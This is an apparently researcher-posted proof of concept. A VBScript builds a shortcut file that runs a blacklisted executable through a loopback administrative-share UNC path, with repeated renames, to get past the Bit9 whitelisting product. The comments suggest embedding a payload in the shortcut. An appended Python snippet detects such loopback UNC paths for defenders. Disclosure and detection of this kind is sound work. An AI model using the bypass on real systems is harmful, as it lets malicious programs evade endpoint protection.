waliedassar

Generated Custom .LNK File

Oct 13th, 2016
' Reported a bug in Bit9 whitelisting soln, where
' A blacklisted/malicious executable (c:\test\test.exe) can bypass Bit9 if run via its UNC path "\\localhost\C$\any.exe" or any other
' UNC equivalent path.
' Attack vector could be .LNK or .PS1 file. I prefer .Lnk since it is rarely blacklisted.
' The VBS script below generates a POC .LNK file that exploits that.
' We can also embed the malicious payload inside the .LNK file itself to have a standalone .LNK file.
' https://twitter.com/waleedassar
set WshShell = WScript.CreateObject("WScript.Shell")
set oShellLink = WshShell.CreateShortcut("B.Lnk")
oShellLink.TargetPath = "Cmd.exe"
oShellLink.Arguments = "/C start \\localhost\C$\test\test.exe & rename \\localhost\C$\test\test.exe test_1.exe & start \\localhost\C$\test\test_1.exe & rename \\localhost\C$\test\test_1.exe test_2.exe & start \\localhost\C$\test\test_2.exe & rename \\localhost\C$\test\test_2.exe test_3.exe & start \\localhost\C$\test\test_3.exe & rename \\localhost\C$\test\test_3.exe test_4.exe & start \\localhost\C$\test\test_4.exe & rename \\localhost\C$\test\test_4.exe test_5.exe"
oShellLink.WindowStyle = 1
oShellLink.IconLocation = "notepad.exe, 0"
oShellLink.Description = "Bit9 Bypass"
oShellLink.Save
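
A defender-side check for the UNC-equivalent path issue described in the comments above, added here as an example (it is not part of the original paste): it finds loopback administrative-share paths in a process command line and maps each to the local path a path-based rule would expect. The function names, `LOCAL_NAMES` and the sample command lines are constructed for illustration.

```python
import ipaddress
import re

# Names that always mean "this machine". Assumption: a real deployment also
# passes the host's own NetBIOS/DNS names and local IPs via extra_names.
LOCAL_NAMES = {"localhost", "--1.ipv6-literal.net"}  # second entry is ::1 in UNC form
BACKSLASH = "\\"

# \\host\X$\rest  or  \\?\UNC\host\X$\rest  (administrative drive share).
# Limitation: path components containing spaces are cut at the first space.
UNC_ADMIN = re.compile(
    r'\\\\(?:\?\\UNC\\)?(?P<host>[^\\/\s"]+)\\(?P<drive>[A-Za-z])\$'
    r'(?P<rest>(?:\\[^\\\s"&|<>]+)*)',
    re.IGNORECASE,
)

def is_local_host(host, extra_names=()):
    """True if the UNC host component refers to the local machine."""
    h = host.lower().rstrip(".")
    if h in LOCAL_NAMES or h in {n.lower() for n in extra_names}:
        return True
    try:
        return ipaddress.ip_address(h).is_loopback  # all of 127.0.0.0/8
    except ValueError:
        return False

def local_equivalents(cmdline, extra_names=()):
    """Return (unc_path, local_path) for each loopback admin-share path found."""
    hits = []
    for m in UNC_ADMIN.finditer(cmdline):
        if is_local_host(m["host"], extra_names):
            local = m["drive"].upper() + ":" + (m["rest"] or BACKSLASH)
            hits.append((m.group(0), local))
    return hits

# Constructed sample command lines (the first mirrors the shortcut's arguments).
SAMPLE = [
    r'cmd.exe /C start \\localhost\C$\test\test.exe & rename \\localhost\C$\test\test.exe test_1.exe',
    r'cmd.exe /C start \\127.0.0.1\c$\test\test.exe',
    r'cmd.exe /C start \\?\UNC\localhost\C$\test\test.exe',
    r'robocopy \\fileserver01\D$\backup C:\restore',
    r'notepad.exe C:\test\notes.txt',
]

if __name__ == "__main__":
    for line in SAMPLE:
        for unc, local in local_equivalents(line):
            print(f"ALERT loopback UNC {unc} -> evaluate policy against {local}")
```

Feeding the returned local path into the same allow/deny lookup used for ordinary paths lets one rule cover both spellings of the file.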